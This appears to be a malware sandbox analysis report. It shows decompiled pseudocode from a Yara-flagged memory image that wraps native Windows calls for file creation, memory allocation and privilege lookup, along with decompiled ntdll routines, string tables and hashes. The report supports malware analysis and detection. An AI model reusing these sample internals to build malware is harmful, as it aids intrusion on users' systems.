                                                			E00419D60(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
                                                				long _t21;
                                                				void* _t31;
                                                
                                                				_t3 = _a4 + 0xc40; // 0xc40
                                                				E0041A960(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
                                                				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
                                                				return _t21;
                                                			}






                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DAD
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419F40(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
                                                				long _t14;
                                                				void* _t21;
                                                
                                                				_t3 = _a4 + 0xc60; // 0xca0
                                                				E0041A960(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
                                                				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
                                                				return _t14;
                                                			}






                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB34,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F79
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 84%
                                                			E00419E8A(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                				signed int _t15;
                                                
                                                				_t15 =  *[fs:edi+ebx] * 0x8b55c984;
                                                				_push(_t15);
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a923
                                                				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}







                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E00419E90(intOrPtr _a4, void* _a8) {
                                                				long _t8;
                                                				void* _t11;
                                                
                                                				_t5 = _a4;
                                                				_t2 = _t5 + 0x10; // 0x300
                                                				_t3 = _t5 + 0xc50; // 0x40a923
                                                				E0041A960(_t11, _a4, _t3,  *_t2, 0, 0x2c);
                                                				_t8 = NtClose(_a8); // executed
                                                				return _t8;
                                                			}






                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EB5
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: acbad0076e7834c89221210f53f3caa4e51465b8d5c72bb1b655ccdf962c13a4
                                                • Instruction ID: 7d18c1e88106df56a5f9a586f92df28fe8df9149e650dba312a4a586df2f6fb1
                                                • Opcode Fuzzy Hash: acbad0076e7834c89221210f53f3caa4e51465b8d5c72bb1b655ccdf962c13a4
                                                • Instruction Fuzzy Hash: 0E9002B534102442D50071994414B060005E7E1355F61C025E5054654DC659CC5671A6
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 72dd23e20a16793ef138fab2d4fe9f9d6de732b9059950b54cd185d50f9973a3
                                                • Instruction ID: 1d384d6b56ae82b55f5879bf42d3a3f68bb819dd90889ca91965ec00ff5d174f
                                                • Opcode Fuzzy Hash: 72dd23e20a16793ef138fab2d4fe9f9d6de732b9059950b54cd185d50f9973a3
                                                • Instruction Fuzzy Hash: 6A90027520102413D511719945047070009A7D0295FA1C422E4414658DD6968956B1A1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 6497a7da82f19eb80b38f8137716d817c36a67bc1e224aed415f8f51be1bb451
                                                • Instruction ID: 1b0ef5e2c58bc43c4c46d18ac1749e1dada88852cb7574b8d488904f2b3cd411
                                                • Opcode Fuzzy Hash: 6497a7da82f19eb80b38f8137716d817c36a67bc1e224aed415f8f51be1bb451
                                                • Instruction Fuzzy Hash: 519002B520202003850571994414616400AA7E0255B61C031E5004690DC565889571A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E0041A063(void* __eax, void* __edi, void* _a4, long _a8, void* _a12) {
                                                				intOrPtr _v0;
                                                				char _t13;
                                                
                                                				_push(ds);
                                                				_t10 = _v0;
                                                				_t3 = _t10 + 0xc74; // 0xc74
                                                				E0041A960(__edi, _v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                				return _t13;
                                                			}





                                                0x0041a06d
                                                0x0041a073
                                                0x0041a07f
                                                0x0041a087
                                                0x0041a09d
                                                0x0041a0a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A070(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                				char _t10;
                                                				void* _t15;
                                                
                                                				_t3 = _a4 + 0xc74; // 0xc74
                                                				E0041A960(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}





                                                0x0041a07f
                                                0x0041a087
                                                0x0041a09d
                                                0x0041a0a1

                                                APIs
                                                • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID:
                                                • API String ID: 3298025750-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A030(intOrPtr _a4, void* _a8, long _a12, long _a16) {
                                                				void* _t10;
                                                				void* _t15;
                                                
                                                				E0041A960(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}





                                                0x0041a047
                                                0x0041a05d
                                                0x0041a061

                                                APIs
                                                • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 79%
                                                			E0041A1CE(signed int __edx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t13;
                                                				void* _t19;
                                                				void* _t23;
                                                
                                                				cs =  *((intOrPtr*)(_t23 + __edx * 2 - 0x75));
                                                				_push(_t23);
                                                				_t10 = _a4;
                                                				E0041A960(_t19, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t10 + 0xa18)), 0, 0x46);
                                                				_t13 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t13;
                                                			}






                                                0x0041a1ce
                                                0x0041a1d0
                                                0x0041a1d3
                                                0x0041a1ea
                                                0x0041a200
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 100%
                                                			E0041A1D0(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                				int _t10;
                                                				void* _t15;
                                                
                                                				E0041A960(_t15, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_a4 + 0xa18)), 0, 0x46);
                                                				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                				return _t10;
                                                			}





                                                0x0041a1ea
                                                0x0041a200
                                                0x0041a204

                                                APIs
                                                • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.533904446.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: LookupPrivilegeValue
                                                • String ID:
                                                • API String ID: 3899507212-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                APIs
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Strings
                                                • The instruction at %p referenced memory at %p., xrefs: 0138B432
                                                • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0138B53F
                                                • read from, xrefs: 0138B4AD, 0138B4B2
                                                • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0138B323
                                                • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0138B484
                                                • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0138B2DC
                                                • *** enter .exr %p for the exception record, xrefs: 0138B4F1
                                                • *** An Access Violation occurred in %ws:%s, xrefs: 0138B48F
                                                • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0138B2F3
                                                • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0138B38F
                                                • This failed because of error %Ix., xrefs: 0138B446
                                                • write to, xrefs: 0138B4A6
                                                • The instruction at %p tried to %s , xrefs: 0138B4B6
                                                • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0138B47D
                                                • *** Inpage error in %ws:%s, xrefs: 0138B418
                                                • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0138B305
                                                • The resource is owned shared by %d threads, xrefs: 0138B37E
                                                • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0138B39B
                                                • *** Resource timeout (%p) in %ws:%s, xrefs: 0138B352
                                                • Go determine why that thread has not released the critical section., xrefs: 0138B3C5
                                                • The critical section is owned by thread %p., xrefs: 0138B3B9
                                                • an invalid address, %p, xrefs: 0138B4CF
                                                • The resource is owned exclusively by thread %p, xrefs: 0138B374
                                                • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0138B314
                                                • a NULL pointer, xrefs: 0138B4E0
                                                • *** enter .cxr %p for the context, xrefs: 0138B50D
                                                • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0138B3D6
                                                • *** then kb to get the faulting stack, xrefs: 0138B51C
                                                • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0138B476
                                                • <unknown>, xrefs: 0138B27E, 0138B2D1, 0138B350, 0138B399, 0138B417, 0138B48E
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • API String ID: 0-108210295
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 77%
                                                			E0130C9BF(signed int __ecx, signed int __edx, signed int _a4, intOrPtr _a12) {
                                                				signed int _v12;
                                                				char _v552;
                                                				char _v1072;
                                                				char _v1073;
                                                				signed int _v1080;
                                                				signed int _v1084;
                                                				signed short _v1088;
                                                				signed int _v1092;
                                                				signed short _v1094;
                                                				char _v1096;
                                                				char _v1100;
                                                				intOrPtr _v1104;
                                                				signed int _v1108;
                                                				char _v1112;
                                                				char _v1116;
                                                				signed short _v1120;
                                                				char _v1124;
                                                				char* _v1128;
                                                				char _v1132;
                                                				char _v1135;
                                                				char _v1136;
                                                				signed int _v1140;
                                                				char _v1144;
                                                				intOrPtr _v1148;
                                                				short _v1150;
                                                				char _v1152;
                                                				signed int _v1156;
                                                				char* _v1160;
                                                				char _v1164;
                                                				signed int _v1168;
                                                				signed int _v1172;
                                                				intOrPtr _v1176;
                                                				intOrPtr _v1180;
                                                				char _v1184;
                                                				signed int _v1188;
                                                				signed int _v1192;
                                                				intOrPtr _v1196;
                                                				char* _v1200;
                                                				intOrPtr _v1204;
                                                				char _v1208;
                                                				char _v1216;
                                                				void* __ebx;
                                                				void* __edi;
                                                				void* __esi;
                                                				signed int _t166;
                                                				void* _t184;
                                                				signed short _t188;
                                                				char _t199;
                                                				intOrPtr _t200;
                                                				signed int _t205;
                                                				signed int _t207;
                                                				intOrPtr _t218;
                                                				short _t219;
                                                				char _t236;
                                                				char _t242;
                                                				signed int _t253;
                                                				intOrPtr _t258;
                                                				void* _t260;
                                                				signed int _t272;
                                                				void* _t276;
                                                				unsigned int _t277;
                                                				signed short _t279;
                                                				signed int _t280;
                                                				void* _t281;
                                                				void* _t305;
                                                
                                                				_t271 = __edx;
                                                				_v12 =  *0x13cd360 ^ _t280;
                                                				_t253 = _a4;
                                                				_v1104 = _a12;
                                                				_t272 = __ecx;
                                                				_v1160 =  &_v1072;
                                                				_v1168 = __ecx;
                                                				_t166 = 0;
                                                				_v1073 = 0;
                                                				_v1084 = 0;
                                                				_t274 = 0;
                                                				_v1156 = 0;
                                                				_v1164 = 0x2080000;
                                                				_v1096 = 0;
                                                				_v1092 = 0;
                                                				_v1112 = 0;
                                                				_v1108 = 0;
                                                				_v1100 = 0;
                                                				if(__ecx == 0) {
                                                					L67:
                                                					_push(_t166);
                                                					_push(_t253);
                                                					_push(_t271);
                                                					_push(_t272);
                                                					E01365720(0x33, 0, "SXS: %s() bad parameters\nSXS:   Map                : %p\nSXS:   Data               : %p\nSXS:   AssemblyRosterIndex: 0x%lx\nSXS:   Map->AssemblyCount : 0x%lx\n", "RtlpResolveAssemblyStorageMapEntry");
                                                					_t274 = 0xc000000d;
                                                					L21:
                                                					if(_v1073 == 0) {
                                                						L23:
                                                						if(_v1092 != 0) {
                                                							E012DAD30(_v1092);
                                                						}
                                                						L24:
                                                						if(_v1084 != 0) {
                                                							_push(_v1084);
                                                							E013195D0();
                                                						}
                                                						_t170 = _v1156;
                                                						if(_v1156 != 0) {
                                                							L012F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t170);
                                                						}
                                                						L26:
                                                						return E0131B640(_t274, _t253, _v12 ^ _t280, _t271, _t272, _t274);
                                                					}
                                                					L22:
                                                					_v1144 = _v1100;
                                                					E0130CCC0(4,  &_v1144, _v1104);
                                                					goto L23;
                                                				}
                                                				if(__edx == 0 || _t253 < 1 || _t253 >  *((intOrPtr*)(__ecx + 4))) {
                                                					_t166 =  *((intOrPtr*)(_t272 + 4));
                                                					goto L67;
                                                				} else {
                                                					if( *((intOrPtr*)( *((intOrPtr*)(__ecx + 8)) + _t253 * 4)) != 0) {
                                                						goto L26;
                                                					}
                                                					asm("lfence");
                                                					_t258 =  *((intOrPtr*)(__edx + 0x18));
                                                					_t260 =  *((intOrPtr*)(_t258 + __edx + 0x10)) + __edx;
                                                					_t276 =  *((intOrPtr*)(_t253 * 0x18 +  *((intOrPtr*)(_t258 + __edx + 0xc)) + __edx + 0x10)) + __edx;
                                                					_t181 =  *((intOrPtr*)(_t276 + 0x50));
                                                					if( *((intOrPtr*)(_t276 + 0x50)) > 0xfffe) {
                                                						_push(__edx);
                                                						E01365720(0x33, 0, "SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p\n", _t181);
                                                						_t274 = 0xc0000106;
                                                						goto L23;
                                                					}
                                                					if(( *(_t276 + 4) & 0x00000010) != 0) {
                                                						_v1080 =  &_v1164;
                                                						_t272 =  *((intOrPtr*)(_t276 + 0x18)) + _t260;
                                                						if(_t272 != 0) {
                                                							_t184 = L013213D0(_t272, 0x5c);
                                                							if(_t184 != 0) {
                                                								_t188 = 0x00000004 + (_t184 - _t272 >> 0x00000001) * 0x00000002 & 0x0000ffff;
                                                								_v1088 = _t188;
                                                								_t277 = _t188 & 0x0000ffff;
                                                								if(_t188 <= 0x208) {
                                                									_t264 = _v1080;
                                                									L39:
                                                									E0131F3E0( *((intOrPtr*)(_t264 + 4)), _t272, _t277 - 2);
                                                									_t281 = _t281 + 0xc;
                                                									 *((short*)( *((intOrPtr*)(_v1080 + 4)) + (_t277 >> 1) * 2 - 2)) = 0;
                                                									 *_v1080 = _v1088 + 0xfffffffe;
                                                									L18:
                                                									if(_v1084 == 0) {
                                                										if(E012E6A00( *((intOrPtr*)(_v1080 + 4)),  &_v1112, 0,  &_v1184) != 0) {
                                                											_v1156 = _v1108;
                                                											_t199 = _v1184;
                                                											if(_t199 == 0) {
                                                												_t200 = 0;
                                                											} else {
                                                												_v1112 = _t199;
                                                												_v1108 = _v1180;
                                                												_t200 = _v1176;
                                                											}
                                                											_v1192 = _v1192 & 0x00000000;
                                                											_v1188 = _v1188 & 0x00000000;
                                                											_v1204 = _t200;
                                                											_push(0x21);
                                                											_v1200 =  &_v1112;
                                                											_push(3);
                                                											_push( &_v1216);
                                                											_v1208 = 0x18;
                                                											_push( &_v1208);
                                                											_push(0x100020);
                                                											_v1196 = 0x40;
                                                											_push( &_v1084);
                                                											_t205 = E01319830();
                                                											_t272 = _v1172;
                                                											_t274 = _t205;
                                                											if(_t272 != 0) {
                                                												asm("lock xadd [edi], eax");
                                                												if((_t205 | 0xffffffff) == 0) {
                                                													_push( *((intOrPtr*)(_t272 + 4)));
                                                													E013195D0();
                                                													L012F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t272);
                                                												}
                                                											}
                                                											if(_t274 >= 0) {
                                                												goto L19;
                                                											} else {
                                                												_push(_t274);
                                                												E01365720(0x33, 0, "SXS: Unable to open assembly directory under storage root \"%S\"; Status = 0x%08lx\n",  *((intOrPtr*)(_v1080 + 4)));
                                                												goto L21;
                                                											}
                                                										}
                                                										E01365720(0x33, 0, "SXS: Attempt to translate DOS path name \"%S\" to NT format failed\n",  *((intOrPtr*)(_v1080 + 4)));
                                                										_t274 = 0xc000003a;
                                                										goto L21;
                                                									}
                                                									L19:
                                                									_t271 = _t253;
                                                									_t207 = E0130CE6C(_v1168, _t253, _v1080,  &_v1084);
                                                									_t274 = _t207;
                                                									if(_t207 < 0) {
                                                										E01365720(0x33, 0, "SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx\n", _t274);
                                                									} else {
                                                										_t274 = 0;
                                                									}
                                                									goto L21;
                                                								}
                                                								_v1094 = _t188;
                                                								_t218 = E012F3A1C(_t277);
                                                								_v1092 = _t218;
                                                								if(_t218 != 0) {
                                                									_t264 =  &_v1096;
                                                									_v1080 =  &_v1096;
                                                									goto L39;
                                                								}
                                                								_t274 = 0xc0000017;
                                                								goto L24;
                                                							}
                                                							_t274 = 0xc00000e5;
                                                							goto L23;
                                                						}
                                                						_t274 = 0xc00000e5;
                                                						goto L26;
                                                					}
                                                					_v1080 = _v1080 & 0x00000000;
                                                					_t219 =  *((intOrPtr*)(_t276 + 0x50));
                                                					_v1152 = _t219;
                                                					_v1150 = _t219;
                                                					_v1144 = __edx;
                                                					_v1148 =  *((intOrPtr*)(_t276 + 0x54)) + _t260;
                                                					_v1140 = _t253;
                                                					_v1128 =  &_v552;
                                                					_v1136 = 0;
                                                					_v1132 = 0x2160000;
                                                					_v1124 = 0;
                                                					_v1116 = 0;
                                                					_v1120 = 0;
                                                					E0130CCC0(1,  &_v1144, _v1104);
                                                					if(_v1116 != 0) {
                                                						_t274 = 0xc0000120;
                                                						goto L23;
                                                					}
                                                					if(_v1124 != 0) {
                                                						_t271 =  &_v1132;
                                                						_t274 = E0130CF6A( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
                                                						if(_t274 >= 0) {
                                                							_t271 = _t253;
                                                							_t274 = E0130CE6C(_t272, _t253,  &_v1132,  &_v1084);
                                                							if(_t274 < 0) {
                                                								_push(_t274);
                                                								_push(_t253);
                                                								_push("SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx\n");
                                                								L44:
                                                								_push(0);
                                                								_push(0x33);
                                                								E01365720();
                                                								goto L23;
                                                							}
                                                							_t274 = 0;
                                                							goto L23;
                                                						}
                                                						_push(_t274);
                                                						_push( &_v1132);
                                                						_push("SXS: Attempt to probe known root of assembly storage (\"%wZ\") failed; Status = 0x%08lx\n");
                                                						goto L44;
                                                					}
                                                					_t279 = _v1120;
                                                					_t272 = 0;
                                                					_t236 = _v1136;
                                                					_v1100 = _t236;
                                                					_v1088 = _t279;
                                                					_v1073 = 1;
                                                					if(_t279 == 0) {
                                                						L16:
                                                						_t305 = _t272 - _t279;
                                                						L17:
                                                						if(_t305 == 0) {
                                                							L54:
                                                							_push(_t272);
                                                							E01365720(0x33, 0, "SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries\n",  &_v1152);
                                                							_t274 = 0xc0150004;
                                                							goto L22;
                                                						}
                                                						goto L18;
                                                					} else {
                                                						goto L10;
                                                					}
                                                					while(1) {
                                                						L10:
                                                						_v1144 = _t236;
                                                						_v1128 =  &_v552;
                                                						_v1140 = _t272;
                                                						_v1132 = 0x2160000;
                                                						_v1136 = 0;
                                                						E0130CCC0(2,  &_v1144, _v1104);
                                                						if(_v1136 != 0) {
                                                							break;
                                                						}
                                                						_t242 = _v1132;
                                                						if(_v1135 != 0) {
                                                							if(_t242 == 0) {
                                                								goto L54;
                                                							}
                                                							_t119 = _t272 + 1; // 0x1
                                                							_t279 = _t119;
                                                							_v1088 = _t279;
                                                						}
                                                						if(_t242 == 0) {
                                                							L27:
                                                							_t272 = _t272 + 1;
                                                							if(_t272 >= _t279) {
                                                								goto L17;
                                                							} else {
                                                								_t236 = _v1100;
                                                								continue;
                                                							}
                                                						}
                                                						if(_v1084 != 0) {
                                                							_push(_v1084);
                                                							E013195D0();
                                                							_v1084 = _v1084 & 0x00000000;
                                                						}
                                                						_t271 =  &_v1132;
                                                						_t274 = E0130CF6A( &_v1132,  &_v1152,  &_v1164,  &_v1096,  &_v1080,  &_v1084);
                                                						if(_t274 < 0) {
                                                							if(_t274 != 0xc0150004) {
                                                								_push(_t274);
                                                								_push( &_v1152);
                                                								E01365720(0x33, 0, "SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx\n",  &_v1132);
                                                								goto L22;
                                                							}
                                                							_t279 = _v1088;
                                                							goto L27;
                                                						} else {
                                                							_t279 = _v1088;
                                                							goto L16;
                                                						}
                                                					}
                                                					_t274 = 0xc0000120;
                                                					goto L22;
                                                				}
                                                			}

                                                0x0130cbbd
                                                0x0134aa67
                                                0x0134aa6d
                                                0x0134aa72
                                                0x0134aa72
                                                0x0130cbe6
                                                0x0130cbf1
                                                0x0130cbf5
                                                0x0134aa84
                                                0x0134aa91
                                                0x0134aa98
                                                0x0134aaa9
                                                0x00000000
                                                0x0134aaae
                                                0x0134aa86
                                                0x00000000
                                                0x0130cbfb
                                                0x0130cbfb
                                                0x00000000
                                                0x0130cbfb
                                                0x0130cbf5
                                                0x0134aab6
                                                0x00000000
                                                0x0134aab6

                                                Strings
                                                • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 0134AB0E
                                                • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 0134AAC8
                                                • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 0134AA1A
                                                • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 0134AC0A
                                                • RtlpResolveAssemblyStorageMapEntry, xrefs: 0134AC27
                                                • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 0134ABF3
                                                • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 0134AC2C
                                                • @, xrefs: 0134ABA3
                                                • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 0134AA11
                                                • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 0134A8EC
                                                • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 0134AAA0
                                                Memory Dump Source
                                                • Source File: 0000001D.00000002.534968805.00000000012B0000.00000040.00000001.sdmp, Offset: 012B0000, based on PE: true
                                                Similarity
                                                • API ID:
                                                • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                • API String ID: 0-4009184096
                                                • Opcode ID: 15aebab4b4e0527667567dffed2359ac34b1098c7b3bde72c6d72a76fb6d4f3c
                                                • Instruction ID: afc6f5635862d0d7bcb1ddd33fd25d6de2613d9bdc1766b6056d171986f94cd4
                                                • Opcode Fuzzy Hash: 15aebab4b4e0527667567dffed2359ac34b1098c7b3bde72c6d72a76fb6d4f3c
                                                • Instruction Fuzzy Hash: 2A0251B1D402299BDF21DB18CD90BDAB7F8AF54708F4051DAE609A7281D730AE85CF59
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 59%
                                                			E01394AEF(void* __ecx, signed int __edx, intOrPtr* _a8, signed int* _a12, signed int* _a16, intOrPtr _a20, intOrPtr _a24) {
                                                				signed int _v6;
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				signed int _v24;
                                                				signed int _v28;
